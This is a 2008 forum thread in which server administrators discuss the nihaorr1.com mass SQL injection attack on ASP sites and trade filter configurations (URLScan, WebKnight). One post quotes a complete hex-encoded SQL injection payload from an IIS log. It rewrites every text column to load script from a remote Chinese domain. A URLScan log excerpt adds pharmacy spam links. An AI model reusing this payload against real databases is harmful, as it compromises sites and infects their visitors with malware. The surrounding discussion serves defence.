« Previous Next »

• 05-21-2008, 10:08 PM

  In reply to

  ejhay Joined on 05-19-2008, 7:42 AM Posts 2

  Re: Anyone know about www.nihaorr1.com/1.js? Reply Contact   Hi, Im a System Administrator of a Hosting Company and one of our website has been hack with SQL injection, At first the hacker inserted nihaorr1.com/1.js most of the website table are being affected with this attacked, after I created that a created a SQL validation like one that you have posted in this forum unfortunately  the hacker  inserted again a  malicious URL on the MS SQL database what I did is I include the validation for all database driven pages to make the website secured but at this time the hacker can insert the script again and again. I think the hacker is using a problem that you executing this kind of hacking activity. please advise what else can I do with this problem. thanks

  Tags: security risksASPsql injectionnihaorr1.comasp code to filter sql injectionvalidationsql injection injection filter code asp cint integers

• 05-21-2008, 10:11 PM

  In reply to

  ejhay Joined on 05-19-2008, 7:42 AM Posts 2

  Re: Anyone know about www.nihaorr1.com/1.js? Reply Contact   Hi, Im a System Administrator of a Hosting Company, and one of our website has been hacked with SQL injection, At first the hacker inserted nihaorr1.com/1.js most of the website table are being affected with this attacked, after that incident I developed a SQL validation that is similar on the asp script that you posted in this forum unfortunately  the hacker  inserted again a  malicious URL on the MS SQL database what I did is I include the validation for all database driven pages to make the website secured but at this time the hacker can insert the script again and again. I think the hacker is using a problem that you executing this kind of hacking activity. please advise what else can I do with this problem. thanks

  Tags: security risksASPsql injectionnihaorr1.comasp code to filter sql injectionvalidationsql injection injection filter code asp cint integers

• 06-05-2008, 1:06 AM

  In reply to

  silkyfixer Joined on 06-05-2008, 5:04 AM Posts 10	Re: Anyone know about www.nihaorr1.com/1.js? Reply Contact i have had a run in with this injection and i have created serveral scripts to clean a database of injection as long as it has not truncated over data. if people need help hit me up.   silkyfixer

• 06-05-2008, 1:07 AM

  In reply to

  silkyfixer Joined on 06-05-2008, 5:04 AM Posts 10	Re: Anyone know about www.nihaorr1.com/1.js? Reply Contact oh and i can fix your poorly coded asp pages that are causing it to happen too.    S.

• 06-09-2008, 12:30 PM

  In reply to

  racekites Joined on 04-21-2008, 8:48 PM Posts 2	Re: Anyone know about www.nihaorr1.com/1.js? Reply Contact does anyone know if the SQL string can contain web encoded characters ? a dash "-" can also be k does SQL Server know what to do with this or will it throw an error ? Cheers A

• 06-20-2008, 5:02 PM

  In reply to

  wybnormal Joined on 06-20-2008, 8:58 PM Posts 1

  Re: Anyone know about www.nihaorr1.com/1.js? Reply Contact You can stop the SQL attacks with an ISPI filter called "WebKnight" which is a freebie. It will among other things, watch for the string length on the forms and if it exceeds X number of characters, it blocks it. It will also look for embedded commands etc. This has stopped the attacks against our servers for the past three weeks. The company name is "Aqtronix" http://www.aqtronix.com/?PageID=99

  Tags: filter webknight sql injection attack block firewall isapi

• 08-11-2008, 5:55 AM

  In reply to

  kimrennin Joined on 08-11-2008, 9:44 AM Posts 1

  Re: Anyone know about www.nihaorr1.com/1.js? Reply Contact The number of infected Web pages spiked to 282,000 in the past day, and appears to be growing. Network managers can check to see whether their Web pages are infected with the iFrame code by looking for a specific code string in the source code of the Web page associated to an iFrame tag. The string is <script src=http://www.nihaorr1.com/1.js>, according to the security vendor.The worst part of it all is that these infestations are not in seamy Web sites, they are taking place in legitimate Web pages. An IFRAME redirects the user to another page, where identity-stealing malware is downloaded onto their computer. So even users who think they are staying clean are not safe. The malicious page scans the visitors machine to find ways to compromise the visitors machine. Exploits are then downloaded and used to infected the redirected visitor based on the information found on the scan. --------------------------- kimrennin WideCircles

• 08-21-2008, 6:43 AM

  In reply to

  steve schofield Joined on 06-10-2002, 4:54 PM MI Posts 3,908	Re: Anyone know about www.nihaorr1.com/1.js? Reply Contact URLScan 3.0 was released to help with these types of automated attacks. http://blogs.iis.net/nazim/archive/2008/08/19/urlscan-v3-0-rtw-released.aspx Steve Schofield Windows Server MVP - IIS http://weblogs.asp.net/steveschofield http://www.IISLogs.com Log archival solution Install, Configure, Forget

• 08-21-2008, 11:28 PM

  In reply to

  silkyfixer Joined on 06-05-2008, 5:04 AM Posts 10	Re: Anyone know about www.nihaorr1.com/1.js? Reply Contact well one sneaked through my urlscan 3.0 i am still trying to figuare out how they got past the declare statement. can you post your config ?   silkyfixer

• 08-22-2008, 12:19 AM

  In reply to

  steve schofield Joined on 06-10-2002, 4:54 PM MI Posts 3,908	Re: Anyone know about www.nihaorr1.com/1.js? Reply Contact Do you have the IIS logs entry that shows the one that squeeked through? http://www.iislogs.com/urlscan.txt is my config. Steve Schofield Windows Server MVP - IIS http://weblogs.asp.net/steveschofield http://www.IISLogs.com Log archival solution Install, Configure, Forget

• 08-22-2008, 11:38 AM

  In reply to

  silkyfixer Joined on 06-05-2008, 5:04 AM Posts 10

  Re: Anyone know about www.nihaorr1.com/1.js? Reply Contact my problem is that i have various websites that connect to the same database i need some sort of trigger that catches the update on the database with a <script in the update and tell me what site it came from. i have sanatized most of my code as well but every 2-3 weeks 1 of my databases still gets infected. would you have a trigger script i could install globaly on my sql server ? thanks silkyfixer

• 08-22-2008, 11:44 AM

  In reply to

  silkyfixer Joined on 06-05-2008, 5:04 AM Posts 10

  Re: Anyone know about www.nihaorr1.com/1.js? Reply Contact i found this for today in my logs i noticed my database was infected this morning. happend last night this is the only declare in my log i wonder if they are using something else other than declare GET /index.asp ;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); 80 - 65.96.169.213 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.04506.648;+.NET+CLR+3.5.21022) - - 200 0 0 34770 1607 9765

• 08-22-2008, 12:14 PM

  In reply to

  steve schofield Joined on 06-10-2002, 4:54 PM MI Posts 3,908	Re: Anyone know about www.nihaorr1.com/1.js? Reply Contact What is your urlscan.ini setup to look for. [SQL Injection Raw] AppliesTo=.asp,.aspx Steve Schofield Windows Server MVP - IIS http://weblogs.asp.net/steveschofield http://www.IISLogs.com Log archival solution Install, Configure, Forget

• 08-22-2008, 1:20 PM

  In reply to

  silkyfixer Joined on 06-05-2008, 5:04 AM Posts 10

  Re: Anyone know about www.nihaorr1.com/1.js? Reply Contact [Options] UseDenyVerbs=1 UseDenyExtensions=1 NormalizeUrlBeforeScan=0 VerifyNormalization=0 AllowHighBitCharacters=1 AllowDotInPath=1 RemoveServerHeader=0 EnableLogging=1 PerProcessLogging=0 AllowLateScanning=0 PerDayLogging=1 UseFastPathReject=0 LogLongUrls=0 UnescapeQueryString=1 RejectResponseUrl= LoggingDirectory=Logs AlternateServerName= RuleList=Edge [Edge] AppliesTo=.asp,.aspx,.inc DenyDataSection=Edge Data ScanURL=0 ScanAllRaw=0 ScanQueryString=1 ScanHeaders= [Edge Data] declare DECLARE cursor CURSOR [AllowVerbs] GET POST HEAD [DenyVerbs] PROPFIND CONNECT [DenyExtensions] .bat .cmd [DenyQueryStringSequences] < > if i try to use some of the ones i find on the net it breaks most of my sites. thanks for your time   silkyfixer

• 08-22-2008, 1:25 PM

  In reply to

  silkyfixer Joined on 06-05-2008, 5:04 AM Posts 10

  Re: Anyone know about www.nihaorr1.com/1.js? Reply Contact here is a snibblet from the log of the urlscan you can see it kicks out the declare so how did it sneak through ? i have about 500 websites that connect to the database so its hard to pinpoint were or how it gets through   [08-22-2008 - 11:41:59] Client at 80.99.117.220: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m.asp' [08-22-2008 - 11:46:44] Client at 189.46.158.208: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m-webtv.asp' [08-22-2008 - 12:05:47] Client at 189.129.167.129: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m.asp' [08-22-2008 - 12:05:48] Client at 189.129.167.129: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m.asp' [08-22-2008 - 12:13:54] Client at 59.29.234.153: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m.asp' [08-22-2008 - 12:20:58] Client at 201.170.148.3: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m.asp' [08-22-2008 - 12:20:59] Client at 201.170.148.3: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m.asp' [08-22-2008 - 12:32:01] Client at 189.24.155.56: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m-webtv.asp' [08-22-2008 - 12:32:01] Client at 189.24.155.56: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m.asp' [08-22-2008 - 12:37:57] Client at 189.149.188.56: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m.asp' [08-22-2008 - 12:37:57] Client at 189.149.188.56: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m.asp' [08-22-2008 - 12:39:22] Client at 201.34.214.205: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m.asp' [08-22-2008 - 12:39:45] Client at 85.99.42.197: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m.asp' [08-22-2008 - 12:43:10] Client at 124.121.28.118: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m-webtv.asp' [08-22-2008 - 12:49:21] Client at 201.211.113.200: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/y.asp' [08-22-2008 - 12:58:06] Client at 122.168.200.189: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m.asp' [08-22-2008 - 13:04:54] Client at 190.19.198.60: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/y.asp' [08-22-2008 - 13:05:58] Client at 122.163.163.163: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m.asp' [08-22-2008 - 13:08:22] Client at 190.19.198.60: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/y.asp' [08-22-2008 - 13:19:44] Client at 195.225.178.21: QueryString contains sequence '%%3C', which is disallowed. Request will be rejected.  Site Instance='1643931472', Raw URL='/AddReview.asp', QueryString='txtName=Cialis&txtLocation=PaokyMzP&txtCmnts=Nise+site.%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fwww.partyvibe.com%%2Fvbulletin%%2Fmember.php%%3Fu%%3D23082%%22%%3ECialis+kaufen%%3C%%2Fa%%3E%%2C++%%25DD%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fwww.newmediamedicine.com%%2Fforum%%2Fmembers%%2Fsamuelbooker.html%%22%%3EValium+online%%0D%%3C%%2Fa%%3E%%2C++5776%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fwww.newmediamedicine.com%%2Fforum%%2Fmembers%%2Fclaytonwilliams.html%%22%%3ETramadol%%3C%%2Fa%%3E%%2C++54245%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fvbulletin.thesite.org%%2Fmember.php%%3Fu%%3D31710%%22%%3Eviagra%%3C%%2Fa%%3E%%2C++renuiq%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fwww.newmediamedicine.com%%2Fforum%%2Fmembers%%2Fkeithbreunig.html%%22%%3EAmbien%%3C%%2Fa%%3E%%2C++nvnti%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fboard.muse.mu%%2Fmember.php%%3Fu%%3D98088%%22%%3EBuy+Tramadol+online%%0D%%3C%%2Fa%%3E%%2C++tbsvm%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fwww.newmediamedicine.com%%2Fforum%%2Fmembers%%2Fsamuelbooker.html%%22%%3EDiazepam%%3C%%2Fa%%3E%%2C++ivbp%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fcommunity.fotopic.net%%2Fuser%%2Fyyogml.html%%22%%3ECheap+Valium%%3C%%2Fa%%3E%%2C++1672%%2C+&escid=1010'